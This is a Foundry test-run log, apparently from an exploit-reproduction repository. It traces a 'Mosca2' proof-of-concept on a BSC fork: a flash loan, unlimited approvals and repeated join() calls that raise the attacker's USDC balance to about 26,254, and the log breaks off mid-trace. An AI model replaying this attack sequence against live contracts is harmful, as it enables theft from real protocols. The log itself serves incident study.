Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.43s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2025-01/Mosca2_exp.sol:44:5:
   |
44 |     address internal constant USDC = 0x8AC76a51cc950d9822D68b83fE1Ad97B32Cd580d;
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
    --> src/test/interface.sol:3064:1:
     |
3064 | interface USDC {
     | ^ (Relevant source part starts here and spans across multiple lines).

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2025-01/Mosca2_exp.sol:60:31:
   |
60 |     function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) external {
   |                               ^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2025-01/Mosca2_exp.sol:60:47:
   |
60 |     function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) external {
   |                                               ^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2025-01/Mosca2_exp.sol:60:88:
   |
60 |     function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) external {
   |                                                                                        ^^^^^^^^^^^^^^^^^^^


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 1.22s (5.87ms CPU time)

Ran 1 test for src/test/2025-01/Mosca2_exp.sol:Mosca2
[PASS] testExploit() (gas: 774333)
Logs:
  Attacker USDC Balance Before exploit: 0.000000000000000000
  Attacker USDC Balance After exploit: 26254.200000000000000000

Traces:
  [10740] Mosca2::setUp()
    ├─ [0] VM::createSelectFork("bsc", 45722243 [4.572e7])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [812733] Mosca2::testExploit()
    ├─ [10328] 0x8AC76a51cc950d9822D68b83fE1Ad97B32Cd580d::symbol() [staticcall]
    │   ├─ [3082] 0xBA5Fe23f8a3a24BEd3236F05F2FcF35fd0BF0B5C::symbol() [delegatecall]
    │   │   └─ ← [Return] "USDC"
    │   └─ ← [Return] "USDC"
    ├─ [3296] 0x8AC76a51cc950d9822D68b83fE1Ad97B32Cd580d::balanceOf(Mosca2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   ├─ [2553] 0xBA5Fe23f8a3a24BEd3236F05F2FcF35fd0BF0B5C::balanceOf(Mosca2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   └─ ← [Return] 0
    │   └─ ← [Return] 0
    ├─ [3076] 0x8AC76a51cc950d9822D68b83fE1Ad97B32Cd580d::decimals() [staticcall]
    │   ├─ [2336] 0xBA5Fe23f8a3a24BEd3236F05F2FcF35fd0BF0B5C::decimals() [delegatecall]
    │   │   └─ ← [Return] 18
    │   └─ ← [Return] 18
    ├─ emit log_named_decimal_uint(key: "Attacker USDC Balance Before exploit", val: 0, decimals: 18)
    ├─ [754645] 0x6098A5638d8D7e9Ed2f952d35B2b67c34EC6B476::flashLoan(0, 7000000000000000000000 [7e21], Mosca2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000063078646561640000000000000000000000000000000000000000000000000000)
    │   ├─ [751934] 0x85351262f7474Ebe23FfAcD633cf20A491F1325D::flashLoan(0, 7000000000000000000000 [7e21], Mosca2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000063078646561640000000000000000000000000000000000000000000000000000) [delegatecall]
    │   │   ├─ [12871] 0x55d398326f99059fF775485246999027B3197955::transfer(Mosca2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 7000000000000000000000 [7e21])
    │   │   │   ├─ emit Transfer(from: 0x6098A5638d8D7e9Ed2f952d35B2b67c34EC6B476, to: Mosca2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 7000000000000000000000 [7e21])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x82bcc9253272a2176c253e21a54ca24177e771a367828bd1251261eb930b899c: 0x0000000000000000000000000000000000000000000035869effd4c94696c62d → 0x00000000000000000000000000000000000000000000340b267c14603036c62d
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0000000000000000000000000000000000000000000000017058b35e777da275 → 0x00000000000000000000000000000000000000000000017ce8dc73c78ddda275
    │   │   │   └─ ← [Return] true
    │   │   ├─ [710128] Mosca2::DPPFlashLoanCall(Mosca2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0, 7000000000000000000000 [7e21], 0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000063078646561640000000000000000000000000000000000000000000000000000)
    │   │   │   ├─ [24562] 0x55d398326f99059fF775485246999027B3197955::approve(0xd8791F0C10B831B605C5D48959EB763B266940B9, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   ├─ emit Approval(owner: Mosca2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0xd8791F0C10B831B605C5D48959EB763B266940B9, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x5f986c7b4c486fa7e45b5de917354feb633a8983f3755c1268f5a0aff5568577: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [25308] 0x8AC76a51cc950d9822D68b83fE1Ad97B32Cd580d::approve(0xd8791F0C10B831B605C5D48959EB763B266940B9, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   ├─ [24562] 0xBA5Fe23f8a3a24BEd3236F05F2FcF35fd0BF0B5C::approve(0xd8791F0C10B831B605C5D48959EB763B266940B9, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77]) [delegatecall]
    │   │   │   │   │   ├─ emit Approval(owner: Mosca2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0xd8791F0C10B831B605C5D48959EB763B266940B9, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x5f986c7b4c486fa7e45b5de917354feb633a8983f3755c1268f5a0aff5568577: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [271915] 0xd8791F0C10B831B605C5D48959EB763B266940B9::join(1000000000000000000000 [1e21], 0, 1, false)
    │   │   │   │   ├─ [10834] 0x55d398326f99059fF775485246999027B3197955::transferFrom(Mosca2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xd8791F0C10B831B605C5D48959EB763B266940B9, 991000000000000000000 [9.91e20])
    │   │   │   │   │   ├─ emit Transfer(from: Mosca2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xd8791F0C10B831B605C5D48959EB763B266940B9, value: 991000000000000000000 [9.91e20])
    │   │   │   │   │   ├─ emit Approval(owner: Mosca2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0xd8791F0C10B831B605C5D48959EB763B266940B9, value: 115792089237316195423570985008687907853269984665640564038466584007913129639935 [1.157e77])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000000017ce8dc73c78ddda275 → 0x0000000000000000000000000000000000000000000001472ff9325291c1a275
    │   │   │   │   │   │   @ 0xfec6d4a197088da49209ada7b3a2dc892fe806fc4f8cbb135b8b2f8f9da6ea4c: 0x00000000000000000000000000000000000000000000026d2730e109aa976d94 → 0x0000000000000000000000000000000000000000000002a2e014227ea6b36d94
    │   │   │   │   │   │   @ 0x5f986c7b4c486fa7e45b5de917354feb633a8983f3755c1268f5a0aff5568577: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xffffffffffffffffffffffffffffffffffffffffffffffca471cbe8b03e3ffff
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [10834] 0x55d398326f99059fF775485246999027B3197955::transferFrom(Mosca2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xD7CFeEDBB70463F66b3fA1449812A162A53586C5, 9000000000000000000 [9e18])
    │   │   │   │   │   ├─ emit Transfer(from: Mosca2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xD7CFeEDBB70463F66b3fA1449812A162A53586C5, value: 9000000000000000000 [9e18])
    │   │   │   │   │   ├─ emit Approval(owner: Mosca2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0xd8791F0C10B831B605C5D48959EB763B266940B9, value: 115792089237316195423570985008687907853269984665640564038457584007913129639935 [1.157e77])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0000000000000000000000000000000000000000000001472ff9325291c1a275 → 0x000000000000000000000000000000000000000000000146b312c601af3da275
    │   │   │   │   │   │   @ 0xd16f6e597792dcd6a27fc9654b060ce252fab663777cd29501c189dabcf7ec06: 0x00000000000000000000000000000000000000000000004e5567440fd7740000 → 0x00000000000000000000000000000000000000000000004ed24db060b9f80000
    │   │   │   │   │   │   @ 0x5f986c7b4c486fa7e45b5de917354feb633a8983f3755c1268f5a0aff5568577: 0xffffffffffffffffffffffffffffffffffffffffffffffca471cbe8b03e3ffff → 0xffffffffffffffffffffffffffffffffffffffffffffffc9ca36523a215fffff
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─  emit topic 0: 0x2538c0efc58891b0799ebc528dc02322420aa60b15c6b3ea15c07432f0cfa2ab
    │   │   │   │   │        topic 1: 0x000000000000000000000000fb5c0a225012abebc46acd94635371bcf0868812
    │   │   │   │   │           data: 0x000000000000000000000000000000000000000000000000000000006784abe00000000000000000000000000000000000000000000000007ce66c50e28400000000000000000000000000000000000000000000000000000000000000000001
    │   │   │   │   ├─  emit topic 0: 0x1c953af84c45fe5100cb56c268757a578196f421e304b18b669f6aeddc201314
    │   │   │   │   │        topic 1: 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   │   │   │           data: 0x000000000000000000000000000000000000000000000000000000006784abe000000000000000000000000000000000000000000000003635c9adc5dea000000000000000000000000000000000000000000000000000000000000000000001
    │   │   │   │   ├─  emit topic 0: 0x645c116d90ebc0d205b6e6960a300051a8b7c74b479be7e8b6eff1db38ff20bc
    │   │   │   │   │        topic 1: 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │           data: 0x000000000000000000000000000000000000000000000000000000006784abe0000000000000000000000000000000000000000000000000445d0d77843fd7a5
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xed79f5a6103cc2504e2b88abca652130eac5b790c6ddb9e498c6f724905db5e0: 0 → 0x00000000000000000000000000000000000000000000000000000000617cd441
    │   │   │   │   │   @ 19: 0x00000000000000000000000000000000000000000000000111bfb5bffb35a3e9 → 0x0000000000000000000000000000000000000000000000019a79d0af03b55333
    │   │   │   │   │   @ 0xed79f5a6103cc2504e2b88abca652130eac5b790c6ddb9e498c6f724905db5dd: 0 → 0x00000000000000000000000000000000000000000000000000000000678de660
    │   │   │   │   │   @ 0x54cdd369e4e8a8515e52ca72ec816c2101831ad1f18bf44102ed171459c9b4f8: 0 → 0x000000000000000000000000000000000000000000000000445d0d77843fd7a5
    │   │   │   │   │   @ 0x5f986c7b4c486fa7e45b5de917354feb633a8983f3755c1268f5a0aff5568577: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xffffffffffffffffffffffffffffffffffffffffffffffca471cbe8b03e3ffff
    │   │   │   │   │   @ 0xed79f5a6103cc2504e2b88abca652130eac5b790c6ddb9e498c6f724905db5d9: 0 → 0x000000000000000000000000000000000000000000000033e41e89b902f07910
    │   │   │   │   │   @ 17: 0x00000000000000000000000000000000000000000000006b3a43a81b5aa80000 → 0x0000000000000000000000000000000000000000000000a1700d55e139480000
    │   │   │   │   │   @ 10: 284 → 285
    │   │   │   │   │   @ 0xed79f5a6103cc2504e2b88abca652130eac5b790c6ddb9e498c6f724905db5e2: 0 → 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   │   │   │   @ 0xed79f5a6103cc2504e2b88abca652130eac5b790c6ddb9e498c6f724905db5dc: 0 → 0x0000000000000000000000000000000000000000000000000000000067a995e0
    │   │   │   │   │   @ 0xc65a7bb8d6351c1cf70c95a316cc6a92839c986682d98bc35f958f4883f9d3c4: 0 → 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   │   │   │   @ 0x67e8695ef67e6eb1e85f26c298cd82c3ef163a2a2f3005dd173b229486a55b20: 0 → 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   │   │   │   @ 0x3707462b181da5757afb393000713f9d89955f52c38cceeebf01e0b050d6ff3e: 0 → 0x00000000000000000000000000000000000000000000000000000000617cd441
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [51512] 0xd8791F0C10B831B605C5D48959EB763B266940B9::join(1000000000000000000000 [1e21], 0, 1, false)
    │   │   │   │   ├─ [6034] 0x55d398326f99059fF775485246999027B3197955::transferFrom(Mosca2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xd8791F0C10B831B605C5D48959EB763B266940B9, 991000000000000000000 [9.91e20])
    │   │   │   │   │   ├─ emit Transfer(from: Mosca2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xd8791F0C10B831B605C5D48959EB763B266940B9, value: 991000000000000000000 [9.91e20])
    │   │   │   │   │   ├─ emit Approval(owner: Mosca2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0xd8791F0C10B831B605C5D48959EB763B266940B9, value: 115792089237316195423570985008687907853269984665640564037466584007913129639935 [1.157e77])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000000146b312c601af3da275 → 0x000000000000000000000000000000000000000000000110fa2f848cb321a275
    │   │   │   │   │   │   @ 0xfec6d4a197088da49209ada7b3a2dc892fe806fc4f8cbb135b8b2f8f9da6ea4c: 0x0000000000000000000000000000000000000000000002a2e014227ea6b36d94 → 0x0000000000000000000000000000000000000000000002d898f763f3a2cf6d94
    │   │   │   │   │   │   @ 0x5f986c7b4c486fa7e45b5de917354feb633a8983f3755c1268f5a0aff5568577: 0xffffffffffffffffffffffffffffffffffffffffffffffc9ca36523a215fffff → 0xffffffffffffffffffffffffffffffffffffffffffffff94115310c52543ffff
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [6034] 0x55d398326f99059fF775485246999027B3197955::transferFrom(Mosca2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xD7CFeEDBB70463F66b3fA1449812A162A53586C5, 9000000000000000000 [9e18])
    │   │   │   │   │   ├─ emit Transfer(from: Mosca2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xD7CFeEDBB70463F66b3fA1449812A162A53586C5, value: 9000000000000000000 [9e18])
    │   │   │   │   │   ├─ emit Approval(owner: Mosca2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0xd8791F0C10B831B605C5D48959EB763B266940B9, value: 115792089237316195423570985008687907853269984665640564037457584007913129639935 [1.157e77])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000000110fa2f848cb321a275 → 0x0000000000000000000000000000000000000000000001107d49183bd09da275
    │   │   │   │   │   │   @ 0xd16f6e597792dcd6a27fc9654b060ce252fab663777cd29501c189dabcf7ec06: 0x00000000000000000000000000000000000000000000004ed24db060b9f80000 → 0x00000000000000000000000000000000000000000000004f4f341cb19c7c0000
    │   │   │   │   │   │   @ 0x5f986c7b4c486fa7e45b5de917354feb633a8983f3755c1268f5a0aff5568577: 0xffffffffffffffffffffffffffffffffffffffffffffff94115310c52543ffff → 0xffffffffffffffffffffffffffffffffffffffffffffff93946ca47442bfffff
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─  emit topic 0: 0x2538c0efc58891b0799ebc528dc02322420aa60b15c6b3ea15c07432f0cfa2ab
    │   │   │   │   │        topic 1: 0x000000000000000000000000fb5c0a225012abebc46acd94635371bcf0868812
    │   │   │   │   │           data: 0x000000000000000000000000000000000000000000000000000000006784abe00000000000000000000000000000000000000000000000007ce66c50e28400000000000000000000000000000000000000000000000000000000000000000001
    │   │   │   │   ├─  emit topic 0: 0x1c953af84c45fe5100cb56c268757a578196f421e304b18b669f6aeddc201314
    │   │   │   │   │        topic 1: 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   │   │   │           data: 0x000000000000000000000000000000000000000000000000000000006784abe000000000000000000000000000000000000000000000003635c9adc5dea000000000000000000000000000000000000000000000000000000000000000000001
    │   │   │   │   ├─  emit topic 0: 0x645c116d90ebc0d205b6e6960a300051a8b7c74b479be7e8b6eff1db38ff20bc
    │   │   │   │   │        topic 1: 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │           data: 0x000000000000000000000000000000000000000000000000000000006784abe0000000000000000000000000000000000000000000000000445d0d77843fd7a5
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xc65a7bb8d6351c1cf70c95a316cc6a92839c986682d98bc35f958f4883f9d3c5: 0 → 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   │   │   │   @ 0x5f986c7b4c486fa7e45b5de917354feb633a8983f3755c1268f5a0aff5568577: 0xffffffffffffffffffffffffffffffffffffffffffffffc9ca36523a215fffff → 0xffffffffffffffffffffffffffffffffffffffffffffff93946ca47442bfffff
    │   │   │   │   │   @ 10: 285 → 286
    │   │   │   │   │   @ 19: 0x0000000000000000000000000000000000000000000000019a79d0af03b55333 → 0x0000000000000000000000000000000000000000000000022333eb9e0c35027d
    │   │   │   │   │   @ 17: 0x0000000000000000000000000000000000000000000000a1700d55e139480000 → 0x0000000000000000000000000000000000000000000000d7a5d703a717e80000
    │   │   │   │   │   @ 0xed79f5a6103cc2504e2b88abca652130eac5b790c6ddb9e498c6f724905db5d9: 0x000000000000000000000000000000000000000000000033e41e89b902f07910 → 0x0000000000000000000000000000000000000000000000941f9bb794b670b3cd
    │   │   │   │   │   @ 0x54cdd369e4e8a8515e52ca72ec816c2101831ad1f18bf44102ed171459c9b4f8: 0x000000000000000000000000000000000000000000000000445d0d77843fd7a5 → 0x00000000000000000000000000000000000000000000000088ba1aef087faf4a
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [51512] 0xd8791F0C10B831B605C5D48959EB763B266940B9::join(1000000000000000000000 [1e21], 0, 1, false)
    │   │   │   │   ├─ [6034] 0x55d398326f99059fF775485246999027B3197955::transferFrom(Mosca2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xd8791F0C10B831B605C5D48959EB763B266940B9, 991000000000000000000 [9.91e20])
    │   │   │   │   │   ├─ emit Transfer(from: Mosca2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xd8791F0C10B831B605C5D48959EB763B266940B9, value: 991000000000000000000 [9.91e20])
    │   │   │   │   │   ├─ emit Approval(owner: Mosca2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0xd8791F0C10B831B605C5D48959EB763B266940B9, value: 115792089237316195423570985008687907853269984665640564036466584007913129639935 [1.157e77])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xfec6d4a197088da49209ada7b3a2dc892fe806fc4f8cbb135b8b2f8f9da6ea4c: 0x0000000000000000000000000000000000000000000002d898f763f3a2cf6d94 → 0x00000000000000000000000000000000000000000000030e51daa5689eeb6d94
    │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0000000000000000000000000000000000000000000001107d49183bd09da275 → 0x0000000000000000000000000000000000000000000000dac465d6c6d481a275
    │   │   │   │   │   │   @ 0x5f986c7b4c486fa7e45b5de917354feb633a8983f3755c1268f5a0aff5568577: 0xffffffffffffffffffffffffffffffffffffffffffffff93946ca47442bfffff → 0xffffffffffffffffffffffffffffffffffffffffffffff5ddb8962ff46a3ffff
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [6034] 0x55d398326f99059fF775485246999027B3197955::transferFrom(Mosca2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xD7CFeEDBB70463F66b3fA1449812A162A53586C5, 9000000000000000000 [9e18])
    │   │   │   │   │   ├─ emit Transfer(from: Mosca2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xD7CFeEDBB70463F66b3fA1449812A162A53586C5, value: 9000000000000000000 [9e18])
    │   │   │   │   │   ├─ emit Approval(owner: Mosca2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0xd8791F0C10B831B605C5D48959EB763B266940B9, value: 115792089237316195423570985008687907853269984665640564036457584007913129639935 [1.157e77])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x5f986c7b4c486fa7e45b5de917354feb633a8983f3755c1268f5a0aff5568577: 0xffffffffffffffffffffffffffffffffffffffffffffff5ddb8962ff46a3ffff → 0xffffffffffffffffffffffffffffffffffffffffffffff5d5ea2f6ae641fffff
    │   │   │   │   │   │   @ 0xd16f6e597792dcd6a27fc9654b060ce252fab663777cd29501c189dabcf7ec06: 0x00000000000000000000000000000000000000000000004f4f341cb19c7c0000 → 0x00000000000000000000000000000000000000000000004fcc1a89027f000000
    │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0000000000000000000000000000000000000000000000dac465d6c6d481a275 → 0x0000000000000000000000000000000000000000000000da477f6a75f1fda275
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─  emit topic 0: 0x2538c0efc58891b0799ebc528dc02322420aa60b15c6b3ea15c07432f0cfa2ab
    │   │   │   │   │        topic 1: 0x000000000000000000000000fb5c0a225012abebc46acd94635371bcf0868812
    │   │   │   │   │           data: 0x000000000000000000000000000000000000000000000000000000006784abe00000000000000000000000000000000000000000000000007ce66c50e28400000000000000000000000000000000000000000000000000000000000000000001
    │   │   │   │   ├─  emit topic 0: 0x1c953af84c45fe5100cb56c268757a578196f421e304b18b669f6aeddc201314
    │   │   │   │   │        topic 1: 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   │   │   │           data: 0x000000000000000000000000000000000000000000000000000000006784abe000000000000000000000000000000000000000000000003635c9adc5dea000000000000000000000000000000000000000000000000000000000000000000001
    │   │   │   │   ├─  emit topic 0: 0x645c116d90ebc0d205b6e6960a300051a8b7c74b479be7e8b6eff1db38ff20bc
    │   │   │   │   │        topic 1: 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │           data: 0x000000000000000000000000000000000000000000000000000000006784abe0000000000000000000000000000000000000000000000000445d0d77843fd7a5
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xed79f5a6103cc2504e2b88abca652130eac5b790c6ddb9e498c6f724905db5d9: 0x0000000000000000000000000000000000000000000000941f9bb794b670b3cd → 0x0000000000000000000000000000000000000000000001532a83d4d39660221b
    │   │   │   │   │   @ 0xc65a7bb8d6351c1cf70c95a316cc6a92839c986682d98bc35f958f4883f9d3c6: 0 → 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   │   │   │   @ 10: 286 → 287
    │   │   │   │   │   @ 0x54cdd369e4e8a8515e52ca72ec816c2101831ad1f18bf44102ed171459c9b4f8: 0x00000000000000000000000000000000000000000000000088ba1aef087faf4a → 0x000000000000000000000000000000000000000000000000cd1728668cbf86ef
    │   │   │   │   │   @ 17: 0x0000000000000000000000000000000000000000000000d7a5d703a717e80000 → 0x00000000000000000000000000000000000000000000010ddba0b16cf6880000
    │   │   │   │   │   @ 19: 0x0000000000000000000000000000000000000000000000022333eb9e0c35027d → 0x000000000000000000000000000000000000000000000002abee068d14b4b1c7
    │   │   │   │   │   @ 0x5f986c7b4c486fa7e45b5de917354feb633a8983f3755c1268f5a0aff5568577: 0xffffffffffffffffffffffffffffffffffffffffffffff93946ca47442bfffff → 0xffffffffffffffffffffffffffffffffffffffffffffff5d5ea2f6ae641fffff
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [51512] 0xd8791F0C10B831B605C5D48959EB763B266940B9::join(1000000000000000000000 [1e21], 0, 1, false)
    │   │   │   │   ├─ [6034] 0x55d398326f99059fF775485246999027B3197955::transferFrom(Mosca2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xd8791F0C10B831B605C5D48959EB763B266940B9, 991000000000000000000 [9.91e20])
    │   │   │   │   │   ├─ emit Transfer(from: Mosca2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xd8791F0C10B831B605C5D48959EB763B266940B9, value: 991000000000000000000 [9.91e20])
    │   │   │   │   │   ├─ emit Approval(owner: Mosca2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0xd8791F0C10B831B605C5D48959EB763B266940B9, value: 115792089237316195423570985008687907853269984665640564035466584007913129639935 [1.157e77])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xfec6d4a197088da49209ada7b3a2dc892fe806fc4f8cbb135b8b2f8f9da6ea4c: 0x00000000000000000000000000000000000000000000030e51daa5689eeb6d94 → 0x0000000000000000000000000000000000000000000003440abde6dd9b076d94
    │   │   │   │   │   │   @ 0x5f986c7b4c486fa7e45b5de917354feb633a8983f3755c1268f5a0aff5568577: 0xffffffffffffffffffffffffffffffffffffffffffffff5d5ea2f6ae641fffff → 0xffffffffffffffffffffffffffffffffffffffffffffff27a5bfb5396803ffff
    │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0000000000000000000000000000000000000000000000da477f6a75f1fda275 → 0x0000000000000000000000000000000000000000000000a48e9c2900f5e1a275
    │   │   │   │   │   └─ ← [Return] true
